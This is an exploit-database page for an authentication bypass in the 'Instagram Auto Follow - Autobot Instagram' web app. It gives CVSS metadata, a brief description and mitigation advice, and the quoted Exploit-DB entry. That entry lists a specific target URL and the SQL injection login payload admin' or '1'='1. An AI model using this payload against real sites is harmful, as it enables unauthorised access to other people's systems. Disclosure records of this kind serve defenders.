header-logo
Suggest Exploit
vendor:
Instagram Auto Follow - Autobot Instagram
by:
Veyselxan
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Instagram Auto Follow - Autobot Instagram
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: No
Related CWE: None
CPE: 23720743
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2019

Instagram Auto Follow – Autobot Instagram – Authentication Bypass

An authentication bypass vulnerability exists in the Instagram Auto Follow - Autobot Instagram application, which allows an attacker to gain access to the application by providing a username of 'admin' or '1'='1' and a password of 'admin' or '1'='1'

Mitigation:

Ensure that authentication credentials are properly validated and that user input is properly sanitized to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Instagram Auto Follow - Autobot Instagram - Authentication Bypass
# Date: 2019-05-01
# Exploit Author: Veyselxan
# Vendor Homepage: https://codecanyon.net/item/instagram-auto-follow-autobot-instagram/23720743?s_rank=4

# Tested on: Linux
https://eowynlab.cf/autobot-follow/index.php


username: admin' or '1'='1

Password: admin' or '1'='1

Navigation

Suggest Exploit

Services By CQR